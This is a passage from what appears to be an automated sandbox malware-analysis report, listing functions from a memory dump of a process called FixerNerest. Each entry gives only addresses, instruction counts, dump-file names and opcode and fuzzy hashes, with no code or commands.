                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5E1B23090CA8E8FEBA8EF28C8557E937D1FF54350F14426EE84DC7295DB78A9458B81
                                                                                                                                                                                                                                            Function 00007FF848F38E30 Relevance: .2, Instructions: 205COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 67bc8f4f48ab38aa91ef17ffc416d8d4f33cc1e72ad207756f5e84dc1adb4e8e
                                                                                                                                                                                                                                            • Instruction ID: e14e4b80aaee5cd2446cc77fa112576e99f917e4907b300a791ccdd67d182441
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67bc8f4f48ab38aa91ef17ffc416d8d4f33cc1e72ad207756f5e84dc1adb4e8e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB614931E3C0130DFBBEB378C8061BA71429B61396F91267BD54CC24D1AF2DB89A6199
                                                                                                                                                                                                                                            Function 00007FF848F36CFA Relevance: 2.9, Strings: 2, Instructions: 373COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: `KH$#CM_^
                                                                                                                                                                                                                                            • API String ID: 0-1048266845
                                                                                                                                                                                                                                            • Opcode ID: 42000c05ff815ea9ea0323eb339a31d84be1d5f7814319bfa906c6571ff40a91
                                                                                                                                                                                                                                            • Instruction ID: c62b7ec8c6cd277986e4d29de080634868d42bb2f4de870fd60052edb961a736
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42000c05ff815ea9ea0323eb339a31d84be1d5f7814319bfa906c6571ff40a91
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CC19E30A1D91A8FEA89F76894517BAB3E2FF98340F64057AE40DC32D2DF2CB8418755
                                                                                                                                                                                                                                            Function 00007FF848F408FA Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ;L_^
                                                                                                                                                                                                                                            • API String ID: 0-3458132336
                                                                                                                                                                                                                                            • Opcode ID: fb617643f2b2bfad5b5d0ed9c44f156d6a5413e19e5e551febde367704b3148d
                                                                                                                                                                                                                                            • Instruction ID: 1f0e3c1edb17e415e6e9e8f63ac196f205ba1954bd0be8ff5955e8583c9f8432
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb617643f2b2bfad5b5d0ed9c44f156d6a5413e19e5e551febde367704b3148d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB510632E1DD5A5EE798FB2CA4450F977D1EFA4B50F04027AD40DE72D7DE28A8468284
                                                                                                                                                                                                                                            Function 00007FF848F40489 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ?L_^
                                                                                                                                                                                                                                            • API String ID: 0-1098677799
                                                                                                                                                                                                                                            • Opcode ID: 364b9ba75d423c0d10a3d42e8a8ab51b4fa6ff5d7b8f71a06304ca99f84a5a3f
                                                                                                                                                                                                                                            • Instruction ID: 915329a70229badea051306c216b958946c38fdb0a197a047753810ee5f398a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 364b9ba75d423c0d10a3d42e8a8ab51b4fa6ff5d7b8f71a06304ca99f84a5a3f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF11E53191E6CA5FE792776868210E63FB0EF97658F0901F7D48CCA0E3DA0C18568366
                                                                                                                                                                                                                                            Function 00007FF848F3C2E9 Relevance: .4, Instructions: 412COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9417b9bd0f7e678cf68172eca3d40c76be444bb46ec7d555f9ec46bb6db87587
                                                                                                                                                                                                                                            • Instruction ID: ae0791be51fc33e59fcb5ee5838a7beb50a2854185eb30314464a3abc8810abf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9417b9bd0f7e678cf68172eca3d40c76be444bb46ec7d555f9ec46bb6db87587
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7D1B43090CA8D8FEBA8EF28C8557E977D1FF59350F04426EE84DC7291DB74A9518B82
                                                                                                                                                                                                                                            Function 00007FF848F3D1A6 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3e2b870ce8b931d7989a0f08a95277f51d88420b3f3a39692554544138065704
                                                                                                                                                                                                                                            • Instruction ID: 7c4755cba22e1821d5b16f211c8a96d8520ff4244268df619d8bfae3527713da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e2b870ce8b931d7989a0f08a95277f51d88420b3f3a39692554544138065704
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71B1B43090CA4D8FEB58EF28C8557E93BE1FF55350F04426AE84DC7292CB749945CB86
                                                                                                                                                                                                                                            Function 00007FF848F3F4BD Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 64f93083c699ac6b57f03966ebe62f76d4de7ad2a0f760f9d1897bd6ce61712c
                                                                                                                                                                                                                                            • Instruction ID: f865385ae806fda41fec550211e4ebddc238f5619eb8f4d2f1599581c4837ec2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64f93083c699ac6b57f03966ebe62f76d4de7ad2a0f760f9d1897bd6ce61712c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F917E31FAD90A5FF7D5A72CC85277962D2EB887A0F5902B6D40DC72D6DD2CAC828341
                                                                                                                                                                                                                                            Function 00007FF848F3E949 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8babbc4d2186dbd02086a5056425900a9036b8fab784410d5f74b1a941888791
                                                                                                                                                                                                                                            • Instruction ID: f941bb7973f1dd78a63acfaf761455089de6f59b43615cd1a2b7246536889e86
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8babbc4d2186dbd02086a5056425900a9036b8fab784410d5f74b1a941888791
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C61C730A1D9099FE784F7A888967BA77E2FF99350F14417AD00DC36D3DE2C68458B15
                                                                                                                                                                                                                                            Function 00007FF848F3A0DC Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b374c4e543f6caba8bbf16e7e05dba07183a178be059145c343cdcb3c90099b4
                                                                                                                                                                                                                                            • Instruction ID: 392b6dc33f9495a5efc8dd6d8bfc62d0b2b72461831c56e351a0eaa192ee1959
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b374c4e543f6caba8bbf16e7e05dba07183a178be059145c343cdcb3c90099b4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA517F71908A1C8FDB58EF58D845BE9BBF1FB59310F0082AAD44DE3252DF34A9858F81
                                                                                                                                                                                                                                            Function 00007FF848F406D0 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 745b1d924c90a0d298aed5744dd30ce327eefd1e911f3eb6cd8ef7125d240c82
                                                                                                                                                                                                                                            • Instruction ID: a2e65068f97b7b6ce2698a0316fcb7c0878fc3d7509299f69974579815ca8205
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 745b1d924c90a0d298aed5744dd30ce327eefd1e911f3eb6cd8ef7125d240c82
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E51D931F2CA014FF25CA72CA44A67577D2EBB9B91F14417FD40DD32D2EE28AC82415A
                                                                                                                                                                                                                                            Function 00007FF848F40FA0 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c5373ae25e3c7ad7efafa40006b9c483462116091c708026a7a2cbd7b7a970bf
                                                                                                                                                                                                                                            • Instruction ID: fb68f49ce60e0bc5da53e6d8c493641ac3c45656d5e3a0fb76ab9d98d862c3b9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5373ae25e3c7ad7efafa40006b9c483462116091c708026a7a2cbd7b7a970bf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47514B31D1CA991FF359A738884A5763BD9EFA6B50F04007EE08ED31D3EE5868438366
                                                                                                                                                                                                                                            Function 00007FF848F3F28A Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4e96db99df4d186578a5bca634900002f63cb346659b036ed6f8517e69c01c93
                                                                                                                                                                                                                                            • Instruction ID: cff9e9ee77d800774d004c34b6e98ada7d67bf0641cbe7a2e5057738248dcc65
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e96db99df4d186578a5bca634900002f63cb346659b036ed6f8517e69c01c93
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C51CE30D0DA9A4FE7A6B77884692B97AE1EF49250F4800BBD80DD72E3DF1C5C468356
                                                                                                                                                                                                                                            Function 00007FF848F3E0F2 Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2a5f4d410a29b68bba7a70608a8c1c5367a8462b2d975e7c0e031c0ab7fca892
                                                                                                                                                                                                                                            • Instruction ID: 7d779dc0d87a13f2c97914918c52dc94bfb07d5bc2834318b28bd8a5967d6d8b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a5f4d410a29b68bba7a70608a8c1c5367a8462b2d975e7c0e031c0ab7fca892
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A51D131E2DD194FEB98FB2C98896B973E1EF98751F44007AE40DD32D2DE29AC418758
                                                                                                                                                                                                                                            Function 00007FF848F3A301 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e1fd07008d810a4a4bec0c1e32cb1dac163ebbebfdc866342f4921a90edfb794
                                                                                                                                                                                                                                            • Instruction ID: 22b65c88300f0891855d645d22d6e84f4da940b556e7073cc5adb8a1817533a7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1fd07008d810a4a4bec0c1e32cb1dac163ebbebfdc866342f4921a90edfb794
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B51CF3190CB4C8FDB19EB68D8457E9BBF1FB55310F1442AED049D7292DB74A845CB82
                                                                                                                                                                                                                                            Function 00007FF848F35200 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bbc370413cb24a37cb847278a41b6d28f66cc8dd763925db2030da8c617d3680
                                                                                                                                                                                                                                            • Instruction ID: a89f0cc8643a5d3794c0f7d75df4898e5edf0a8e997f902a69d7e963433ed680
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbc370413cb24a37cb847278a41b6d28f66cc8dd763925db2030da8c617d3680
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C41C131E2D9195FEB98FB2C94856B973E1EF88791F44007AE40DD32D2DE29AC418758
                                                                                                                                                                                                                                            Function 00007FF848F402E9 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 12da5153fcbe5b1ddf7d31dc64aad5b000214abed36eb48e5ff892a4d8e8a63c
                                                                                                                                                                                                                                            • Instruction ID: e3b7b9698d93bde273dc64a9278b78a4cca0b92bdbe6b1dfda5487a12eae6a0f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12da5153fcbe5b1ddf7d31dc64aad5b000214abed36eb48e5ff892a4d8e8a63c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55518C31D1C9598FEB84FB68D4656F877E1EFA9740F0504BAD80DE72D2CB28AC018745
                                                                                                                                                                                                                                            Function 00007FF848F35208 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4b415388d91963c02ba8969f1201468a951a5c2469c4ea1eb3fbac85439e1800
                                                                                                                                                                                                                                            • Instruction ID: f4e980a6cd59a9c86669cf62cd1cc3b1412efe931487e025f0747ecca39e27ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b415388d91963c02ba8969f1201468a951a5c2469c4ea1eb3fbac85439e1800
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C41C331E2CD195FEB98FB2C98896B972E1EF98751F44007AE40DD32D2DE39AC418758
                                                                                                                                                                                                                                            Function 00007FF848F3F04E Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a7c88bb237820c7ddecef582d8330f3a70cc4828261fca85766fdb56639e3395
                                                                                                                                                                                                                                            • Instruction ID: 4fbd547dfa88f883d095830388466f75621472843c3c034bc836932f8da41725
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7c88bb237820c7ddecef582d8330f3a70cc4828261fca85766fdb56639e3395
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C515C30E1981A9FEB94FB68D8956B8B2E2EF58391F40007AD80DD32E6DF286C418744
                                                                                                                                                                                                                                            Function 00007FF848F40D20 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6df8dcc08623566266e7393de0443483027543271ea91197b795ef3348b5d803
                                                                                                                                                                                                                                            • Instruction ID: e0bf93b818e22f72988e9b8c65f6947d48afa9de3092dad4ddbf5118f56098e1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6df8dcc08623566266e7393de0443483027543271ea91197b795ef3348b5d803
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74417031F1C91D8FEB95B72894596B836E1FFA9751F59007AD00ED32D2EF2898818705
                                                                                                                                                                                                                                            Function 00007FF848F3EB94 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f6e97c8c160e97a986960298fd51d3b720a05642ef3d7706544343735e220316
                                                                                                                                                                                                                                            • Instruction ID: 38a46ec38c968d54756cdafcbc188d7a705bf2d2f3a3034606948403e4fe4a3f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6e97c8c160e97a986960298fd51d3b720a05642ef3d7706544343735e220316
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F341B831E0C91E4FEBA5FB2894466FD77E2FF88381F4400B6D40DD32C2DA28A8428785
                                                                                                                                                                                                                                            Function 00007FF848F3E6A0 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 7056ddf87f2e97c53fec682e7f9ba4bc89bef00b9cfc8d53e008dcfbf47af93c
                                                                                                                                                                                                                                            • Instruction ID: d3d3f8d286e475dc375d1ac80ce23914311a1d88b355938c8d9112e86420fe42
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7056ddf87f2e97c53fec682e7f9ba4bc89bef00b9cfc8d53e008dcfbf47af93c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441DE72E1D88B9FF699BB3884592A8ABD1FF60780F4841B7C41CC75D2CF19AC498345
                                                                                                                                                                                                                                            Function 00007FF848F3F09F Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c75676086fdaaf1748a4590b3fb92c2b55fe1139f64da00d59201003ac51aed0
                                                                                                                                                                                                                                            • Instruction ID: 782fdbfb98385273815cb2400dd93425fc85ab37fe1d87f3539f021eaff408cf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c75676086fdaaf1748a4590b3fb92c2b55fe1139f64da00d59201003ac51aed0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54413C31E1891A9FEB94FB68E8956BCB2E2EF58351F40017AD80DD32E6DF286C418754
                                                                                                                                                                                                                                            Function 00007FF848F3DFA8 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3445ed4d7b8c5f68c269e227bb4802c5d16e45d720ec6762bcaabb475f86fa43
                                                                                                                                                                                                                                            • Instruction ID: 83c89292ef1e1627611813518c9bc146d1c9436170623e7abbc08a314d35f5ea
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3445ed4d7b8c5f68c269e227bb4802c5d16e45d720ec6762bcaabb475f86fa43
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F418631E1991E8FEBA5FB2894456FD72E2FF98381F44047AE40DD32C1DB38A8418685
                                                                                                                                                                                                                                            Function 00007FF848F40B78 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
